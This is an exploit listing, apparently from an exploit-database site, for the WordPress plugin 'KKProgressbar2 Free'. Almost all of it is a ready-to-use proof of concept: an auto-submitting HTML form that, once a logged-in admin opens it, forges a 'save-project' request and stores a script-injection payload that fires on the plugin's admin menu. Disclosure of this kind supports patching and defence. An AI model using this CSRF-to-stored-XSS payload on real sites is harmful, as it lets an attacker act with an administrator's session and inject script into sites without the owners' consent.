Share
## https://sploitus.com/exploit?id=WPEX-ID:7B0046D4-CF95-4307-95A5-9B823F2DAAAA
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
<input type="hidden" name="action" value="save-project">
<input type="hidden" name="kkpb_project_name" value='"><script>alert(/XSS/)</script>'>
<input type="hidden" name="kkpb_project_link" value="csrf">
<input type="hidden" name="kkpb_project_description" value="<p>csrf</p>">
<input type="hidden" name="kkpb-auto" value="on">
<input type="hidden" name="kkpb_procent" value="0">
<input type="hidden" name="kkpb-input-name[]" value="">
<input type="hidden" name="kkpb-input-auto[]" value="">
<input type="hidden" name="kkpb-input-progress[]" value="">
<input type="hidden" name="kkpb-input-all[]" value="">
<input type="hidden" name="kkpb-input-now[]" value="">
<input type="hidden" name="kkpb-input-status[]" value="1">
</form>
</body>
```
XSS will trigger on the "KKProgressbar2 Free" menu